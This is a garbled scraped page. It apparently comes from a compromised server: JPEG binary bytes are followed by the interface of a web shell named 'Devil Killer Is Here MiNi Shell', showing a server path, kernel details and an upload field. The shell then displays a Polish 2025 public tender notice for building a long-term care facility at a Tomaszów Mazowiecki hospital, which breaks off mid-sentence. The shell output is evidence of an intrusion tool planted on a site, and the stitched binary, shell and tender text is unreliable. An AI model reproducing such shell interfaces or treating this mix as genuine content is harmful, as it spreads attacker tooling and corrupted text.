JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /proc/thread-self/root/home/vmanager/www/common/web/tenders/20250611/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : //proc/thread-self/root/home/vmanager/www/common/web/tenders/20250611/0027436701-N-2025.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Roboty budowlane<br/> Wykonanie dokumentacji projektowej wraz z uzyskaniem niezbędnych decyzji administracyjnych oraz rozbudowa, przebudowa oraz modernizacja obiektu w ramach zadania pn.: Rozwój opieki wspierającej ... </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">TOMASZOWSKIE CENTRUM ZDROWIA SPÓŁKA Z OGRANICZONĄ ODPOWIEDZIALNOŚCIĄ</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 100558733</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">ul. Jana Pawła II 35</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Tomaszów Mazowiecki</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">97-200</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">łódzkie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL713 - Piotrkowski</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">adac13@wp.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">www.szpitalwtomaszowie.pl</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - jednostka sektora finansów publicznych - jednostka samorządu terytorialnego</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Zdrowie</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> Wykonanie dokumentacji projektowej wraz z uzyskaniem niezbędnych decyzji administracyjnych oraz rozbudowa, przebudowa oraz modernizacja obiektu w ramach zadania pn.: Rozwój opieki wspierającej ... </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-084edca2-0308-4b30-98bd-edb085384404</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2025/BZP 00274367</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2025-06-11</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.15.) Nazwa projektu lub programu</h3> <p class="mb-0"> Krajowy Plan Odbudowy i Zwiększenia Odporności: Komponent D „ Efektywność, dostępność i jakość systemu ochrony zdrowia” Inwestycja D4.1.1 „ Rozwój opieki długoterminowej poprze modernizację infrastruktury podmiotów leczniczych na poziomie powiatowym” U M O W A nr KPOD.07.08-IP.10-0101/24/KPO/2051/2025/65. </p> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://ezamowienia.gov.pl/mp-client/search/list/ocds-148610-084edca2-0308-4b30-98bd-edb085384404 <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">https://ezamowienia.gov.pl//</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">Wykonawca zamierzający wziąć udział<br/> w postępowaniu o udzielenie zamówienia publicznego musi posiadać konto podmiotu „Wykonawca” na Platformie e-Zamówienia.<br/> Szczegółowe informacje na temat zakładania kont podmiotów oraz zasady i warunki korzystania z Platformy e-Zamówienia określa<br/> Regulamin Platformy e-Zamówienia, dostępny na stronie internetowej https://ezamowienia.gov.pl/pl/regulamin/#regulamin-serwisu<br/> oraz informacje zamieszczone w zakładce „Centrum Pomocy”. 11.5. Przeglądanie i pobieranie publicznej treści dokumentacji<br/> postępowania nie wymaga posiadania konta na Platformie eZamówienia ani logowania do Platformy e-Zamówienia. Sposób<br/> sporządzenia dokumentów elektronicznych lub dokumentów elektronicznych będących kopią elektroniczną treści zapisanej w postaci<br/> papierowej (cyfrowe odwzorowania) musi być zgodny z wymaganiami określonymi w rozporządzeniu Prezesa Rady Ministrów z dnia<br/> 30 grudnia 2020 r. w sprawie sposobu sporządzania i przekazywania informacji oraz wymagań technicznych dla dokumentów<br/> elektronicznych oraz środków komunikacji elektronicznej w postępowaniu o udzielenie zamówienia publicznego lub konkursie. 11.7.<br/> Dokumenty elektroniczne, o których mowa w § 2 ust. 1 rozporządzenia , o którym mowa w pkt 11.6 SWZ, sporządza się w postaci<br/> elektronicznej, w formatach danych określonych w przepisach rozporządzenia Rady Ministrów z dnia 12 kwietnia 2012 r. w sprawie<br/> Krajowych Ram Interoperacyjności, minimalnych wymagań dla rejestrów publicznych i wymiany informacji w postaci elektronicznej<br/> oraz minimalnych wymagań dla systemów teleinformatycznych, z uwzględnieniem rodzaju przekazywanych danych i przekazuje się<br/> jako załączniki. W przypadku formatów, o których mowa w art. 66 ust. 1 ustawy Pzp, ww. regulacje nie będą miały bezpośredniego<br/> zastosowania. Szczegółowe informacje znajdują się w rozdziale XI SWZ</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">Zgodnie z art. 13 ust. 1 i 2 rozporządzenia Parlamentu Europejskiego i Rady (UE) 2016/679 z dnia 27 kwietnia 2016 r. w sprawie ochrony osób fizycznych w związku z przetwarzaniem danych osobowych i w sprawie swobodnego przepływu takich <br/>danych oraz uchylenia dyrektywy 95/46/WE (ogólne rozporządzenie o ochronie danych) (Dz. Urz. UE L 119 z 04.05.2016, str. 1), dalej „RODO”, Zamawiający <br/>informuje, że: <br/>1) Jest administratorem danych osobowych Wykonawcy oraz osób, których dane Wykonawca przekazał w niniejszym postępowaniu;<br/>dane osobowe Wykonawcy przetwarzane będą na podstawie art. 6 ust. 1 lit. c RODO w celu związanym z postępowaniem o udzielenie zamówienia publicznego na zadanie pn.: „Wykonanie dokumentacji projektowej wraz z uzyskaniem niezbędnych decyzji administracyjnych oraz rozbudowa, przebudowa oraz modernizacja obiektu w ramach zadania pn.: Rozwój opieki wspierającej na terenie powiatu tomaszowskiego poprzez utworzenie zakładu opieki długoterminowej- „BEZPIECZNA PRZYSTAŃ” w Tomaszowskim Centrum Zdrowia Sp. z o.o.- w systemie zaprojektuj i wybuduj<br/>Nazwa projektu: „Racjonalizacja zużycia energii w budynkach użyteczności publicznej oraz zasobach komunalnych”<br/><br/>2) odbiorcami danych osobowych Wykonawcy będą osoby lub podmioty, którym udostępniona zostanie dokumentacja postępowania w oparciu o art. 18 oraz art. 74 ustawy z dnia 11 września 2019 r. Prawo zamówień publicznych (Dz. U. z 2024 r. poz. 1320), dalej „ustawa Pzp”; <br/>3) dane osobowe Wykonawcy będą przechowywane, zgodnie z art. 78 ust. 1 ustawy Pzp, przez okres 4 lat od dnia zakończenia postępowania o udzielenie zamówienia, w sposób gwarantujący jego nienaruszalność.<br/>4) obowiązek podania przez Wykonawcę danych osobowych bezpośrednio go dotyczących jest wymogiem ustawowym określonym w przepisach ustawy Pzp, związanym z udziałem w postępowaniu o udzielenie zamówienia publicznego; konsekwencje niepodania określonych danych wynikają z ustawy Pzp; <br/>5) w odniesieniu do danych osobowych Wykonawcy decyzje nie będą podejmowane w sposób zautomatyzowany, stosowanie do art. 22 RODO;<br/>6) Wykonawca posiada:<br/>na podstawie art. 15 RODO prawo dostępu do danych osobowych dotyczących Wykonawcy;<br/>na podstawie art. 16 RODO prawo do sprostowania danych osobowych, o ile ich zmiana nie skutkuje zmianą wyniku postępowania o udzielenie zamówienia <br/>publicznego ani zmianą postanowień umowy w zakresie niezgodnym z ustawą Pzp oraz nie narusza integralności protokołu oraz jego załączników;<br/>na podstawie art. 18 RODO prawo żądania od administratora ograniczenia przetwarzania danych osobowych z zastrzeżeniem przypadków, o których mowa w art. 18 ust. 2 RODO; <br/>prawo do wniesienia skargi do Prezesa Urzędu Ochrony Danych Osobowych, gdy Wykonawca uzna, że przetwarzanie jego danych osobowych narusza przepisy RODO;<br/>7) Wykonawcy nie przysługuje:<br/>w związku z art. 17 ust. 3 lit. b, d lub e RODO prawo do usunięcia danych osobowych;<br/>prawo do przenoszenia danych osobowych, o którym mowa w art. 20 RODO;<br/>na podstawie art. 21 RODO prawo sprzeciwu, wobec przetwarzania danych osobowych, gdyż podstawą prawną przetwarzania danych osobowych Wykonawcy jest art. 6 ust. 1 lit. c RODO.</span></h3> <h3 class="mb-0">3.16.) RODO (ograniczenia stosowania): <span class="normal">W przypadku, gdy wykonanie obowiązków, o których mowa w art. 15 ust. 1-3 rozporządzenia 2016/679, wymagałoby niewspółmiernie dużego wysiłku, Zamawiający może żądać od osoby, której dane dotyczą, wskazania dodatkowych informacji mających na celu sprecyzowanie żądania, w szczególności podania nazwy lub daty postępowania o udzielenie zamówienia publicznego lub konkursu.<br/>Skorzystanie przez osobę, której dane dotyczą, z uprawnienia do sprostowania lub uzupełnienia danych osobowych, o którym mowa w art. 16 rozporządzenia 2016/679, nie może skutkować zmianą wyniku postępowania o udzielenie zamówienia publicznego lub konkursu ani zmianą postanowień umowy w zakresie niezgodnym <br/>z ustawą.<br/>Wystąpienie z żądaniem, o którym mowa w art. 18 ust. 1 rozporządzenia 2016/679, nie ogranicza przetwarzania danych osobowych do czasu zakończenia postępowania <br/>o udzielenie zamówienia publicznego lub konkursu.<br/>W przypadku danych osobowych zamieszczonych przez Zamawiającego w Biuletynie Zamówień Publicznych, prawa, o których mowa w art. 15 i art. 16 rozporządzenia 2016/679, są wykonywane w drodze żądania skierowanego do Zamawiającego.</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2><h3 class="mb-0">4.1.) Informacje ogólne odnoszące się do przedmiotu zamówienia.</h3> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">ZP/26/Sp./2025</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Roboty budowlane</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Rozwój opieki wspierającej na terenie powiatu tomaszowskiego poprzez utworzenie zakładu opieki długoterminowej- „BEZPIECZNA PRZYSTAŃ” w Tomaszowskim Centrum Zdrowia Sp. z o.o.- realizacja w systemie zaprojektuj i wybuduj obejmuje: <br/>w zakresie zaprojektuj:<br/>- wykonanie ekspertyzy lub opinii technicznej dotyczącej stanu technicznego budynku objętego przebudową, modernizacją,<br/>- wykonanie badań geotechnicznych gruntu,<br/>- zakup mapy do celów projektowych,<br/>- uzyskanie zgody na odstępstwa od obowiązujących przepisów, w tym w szczególności przepisów<br/>w zakresie warunków ochrony przeciwpożarowej i higieniczno-sanitarnych, tylko w uzasadnionych<br/>przypadkach;<br/>- sporządzenie projektu budowlanego: architektoniczno-budowlanego , projektu zagospodarowania terenu zgodnie z zapisami programu funkcjonalno- użytkowego ( PFU) <br/>- sporządzenie pełnobranżowego projektu technicznego zgodnie z projektem budowlanym oraz zapisami programu funkcjonalno- użytkowego ( PFU)<br/>- uzyskanie uzgodnień rzeczoznawcy do spraw higieniczno-sanitarnych oraz ds. ochrony przeciwpożarowej dot. projektu budowlanego oraz technicznego instalacji fotowoltaicznej;<br/>- uzyskanie w imieniu Zamawiającego odpowiednich opinii, uzgodnień i decyzji administracyjnych,<br/>niezbędnych do realizacji inwestycji wymaganych Prawem Budowlanym lub odrębnymi przepisami w tym: <br/>uzyskanie decyzji celu publicznego,<br/>uzyskanie decyzji środowiskowej- jeśli dotyczy,<br/>uzyskanie decyzji na wycinkę drzew, krzewów - jeśli dotyczy,<br/>uzyskanie decyzji pozwolenia na budowę,<br/> uzyskanie zgłoszenia o braku sprzeciwu,<br/>- wykonanie harmonogramu rzeczowo-finansowego w uzgodnieniu z zamawiającym;<br/>- wykonanie kosztorysów ofertowych z uwzględnieniem podziału zakresu rzeczowego, który umożliwi ustalenie rodzaju i kosztów poszczególnych środków trwałych w rozumieniu Rozporządzenia Rady Ministrów w sprawie Klasyfikacji Środków Trwałych.<br/>-zapewnienie nadzoru autorskiego autora projektu w zakresie, o którym mowa w Ustawie z dnia 7 lipca<br/>1994r. Prawo Budowlane (Dz.U. z 2023.poz.682 z późn. zm.) z uwzględnieniem min 5 wizyt <br/>w trakcie prac projektowych i wykonania robót budowlanych. <br/>- sporządzenie projektu aranżacji wnętrz wraz z zestawieniem i specyfikacją techniczną wyposażenia meblowego zgodnie z zapisami z PFU,<br/>- udział w przygotowaniu dokumentów dotyczących umowy z dostawcą energii w tym warunki przyłączenia do sieci i sprzedaży nadwyżek wyprodukowanej energii- jeśli dotyczy.<br/><br/>W zakresie wybuduj:<br/><br/>Należy dokonać przebudowy, rozbudowy, nadbudowy i modernizacja istniejącej infrastruktury budowlanej wraz z niezbędnymi instalacjami infrastruktury technicznej na potrzeby zakładu opieki długoterminowej .<br/>W zakresie wybuduj powstanie budynek wolnostojący z jedną kondygnacją nadziemną niepodpiwniczony o powierzchni użytkowej 775,13 m² i powierzchni zabudowy 898,07 m² na terenie TCZ Sp. z o.o. <br/>Zakres robót obejmować będzie m.in.:<br/>- wykonanie rozbiórek i kompletnych robót budowlano-instalacyjnych na podstawie PFU <br/>i dokumentacji technicznej;<br/>- wykonanie prac wykończeniowych w tym zabudowy meblowe<br/>- montaż wyposażenia trwale związanego z budynkiem, w tym biały montaż wraz z armaturą <br/>i akcesoriami, wyposażenia socjalno-bytowego zgodnie z PFU<br/>- montaż stolarki okiennej i drzwiowej,<br/>- budowa sieci światłowodowej podziemnej i napowietrznej, utworzenie sieci LAN, Sieć Wi-Fi, system przyzywowy w salach pacjentów oraz łazienkach, monitoring wizyjny, system telefoni, Voip, system nagłośnienia, system KD z wideo domofonem,<br/>- wykonanie instalacja wodno-kanalizacyjna, instalacja z.w.u oraz instalacja c.w.u <br/>- wykonanie instalacji kanalizacji deszczowej<br/>- wykonanie instalacji c.o posadzkowej,<br/>- wykonanie instalacja wentylacji mechanicznej, klimatyzacji, instalacji gazów medycznych,<br/>- wykonanie instalacji elektrycznej wewnętrznej i zewnętrznej zasilającej wraz z rozdzielniami elektrycznymi, <br/>- wykonanie instalacji fotowoltaicznej<br/>- wykonanie oświetlenia zewnętrznego wraz z monitoringiem zewnętrznym,<br/>- wykonanie dróg ewakuacyjnych, instalacji uwzględniających potrzeby i zabezpieczenia ochrony przeciwpożarowej<br/>- wykonanie prób, badań i rozruchów wszystkich nowobudowanych instalacji, potwierdzonych protokołami i odbiorami osób uprawnionych,<br/>- wykonanie dokumentacji powykonawczej w 2 egz. w wersji papierowej oraz elektronicznej na pendrive w 2 egz,<br/>- wykonanie inwentaryzacji powykonawczej w 3m egz. w wersji papierowej i elektronicznej na pendrive,<br/>- uzyskanie niezbędnych opinii do uzyskania decyzji pozwolenia na użytkowanie,<br/>- sporządzenie w imieniu zamawiającego kompletnego wniosku na uzyskanie decyzji pozwolenia na użytkowanie z Powiatowego Inspektoratu Nadzoru Budowlanego ( PINB)<br/>- przygotowanie zgłoszenia instalacji fotowoltaicznej do zakładu energetycznego (PGE), lokalnego operatora sieci,<br/>- przygotowanie stosownych dokumentów do powiadamiania Państwowej Straży Pożarnej <br/>o rozpoczęciu eksploatacji instalacji fotowoltaicznej. Do odbioru instalacji fotowoltaicznej wymagane są również plany elektryczne i certyfikaty bezpieczeństwa w celu potwierdzenia, że instalacja spełnia niezbędne normy bezpieczeństwa i jest zgodna z przepisami,<br/>- sporządzenie koniecznych instrukcji i przeszkoleń personelu,<br/>- uwzględnienie serwisowania urządzeń oraz instalacji w okresie gwarancji,<br/><br/>2) Szczegółowy zakres inwestycji zawarty jest w programie funkcjonalno-użytkowym będącym załącznikiem Nr 1 do SWZ tj. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">45000000-7 - Roboty budowlane</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">71221000-3 - Usługi architektoniczne w zakresie obiektów budowlanych</p> <p class="mb-0">45215140-0 - Roboty budowlane w zakresie obiektów szpitalnych</p> <p class="mb-0">45200000-9 - Roboty budowlane w zakresie wznoszenia kompletnych obiektów budowlanych lub ich części oraz roboty w zakresie inżynierii lądowej i wodnej</p> <p class="mb-0">45310000-3 - Roboty instalacyjne elektryczne</p> <p class="mb-0">45314000-1 - Instalowanie urządzeń telekomunikacyjnych</p> <p class="mb-0">45330000-9 - Roboty instalacyjne wodno-kanalizacyjne i sanitarne</p> <p class="mb-0">45331000-6 - Instalowanie urządzeń grzewczych, wentylacyjnych i klimatyzacyjnych</p> <p class="mb-0">45400000-1 - Roboty wykończeniowe w zakresie obiektów budowlanych</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <!-- realizacja w dniach --> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">11 miesiące</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert</h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">17.1 Zamawiający dokona oceny ofert, które nie zostały odrzucone, na podstawie następujących kryteriów oceny ofert:<br/><br/>Lp.<br/>Nazwa kryterium<br/>Znaczenie kryterium (w %)<br/>1<br/>Cena (C) 60<br/>2<br/>Długość okresu gwarancji na roboty budowlane z zamontowanymi urządzeniami (G) 40</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal"> Punktowo </span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: </h3> serwis posprzedażny, pomoc techniczna, warunki dostawy takich jak termin, sposób lub czas dostawy, oraz okresu realizacji. <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Długość okresu gwarancji na roboty budowlane z zamontowanymi urządzeniami</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> 1. ZDOLNOŚCI TECHNICZNE<br/>W zakresie robót budowlanych:<br/>a) Zamawiający uzna, iż Wykonawca spełni warunek udziału w postępowaniu, jeżeli wykaże, iż w okresie ostatnich pięciu lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy to w tym okresie wykonał należycie:	<br/>co najmniej jedną robotę budowlaną polegającą na budowie budynku użyteczności publicznej o powierzchni zabudowy min. 400 m2<br/><br/>W zakresie projektowania:<br/>b) Zamawiający uzna, iż wykonawca spełni warunek jeżeli wykaże, iż w okresie ostatnich 3 lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy to w tym okresie wykonał należycie:<br/><br/>co najmniej 1 usługę polegającą na opracowaniu dokumentacji projektowej wraz <br/>z uzyskaniem decyzji pozwolenia na budowę w zakresie budowy obiektu użyteczności publicznej <br/><br/>Definicje: <br/>Za budynek użyteczności publicznej uznaje się budynek przeznaczony dla administracji publicznej, wymiaru sprawiedliwości, kultury, kultu religijnego, oświaty, szkolnictwa wyższego, nauki, opieki zdrowotnej, opieki społecznej i socjalnej, obsługi bankowej, handlu, gastronomii, usług, turystyki, sportu, obsługi pasażerów w transporcie kolejowym, drogowym, lotniczym lub wodnym, poczty lub telekomunikacji oraz inny ogólnodostępny budynek przeznaczony do wykonywania podobnych funkcji. Za budynek użyteczności publicznej uznaje się także budynek biurowy i socjalny. . <br/>Przez budowę zamawiający rozumie wykonywanie obiektu budowlanego w określonym miejscu, a także odbudowę, rozbudowę, nadbudowę obiektu budowlanego. <br/><br/>2. ZDOLNOŚCI ZAWODOWE <br/> <br/>Wykonawca musi mieć do dyspozycji odpowiednio wykwalifikowany personel, posiadający wymagane obowiązującymi przepisami uprawnienia, (jeżeli ustawy 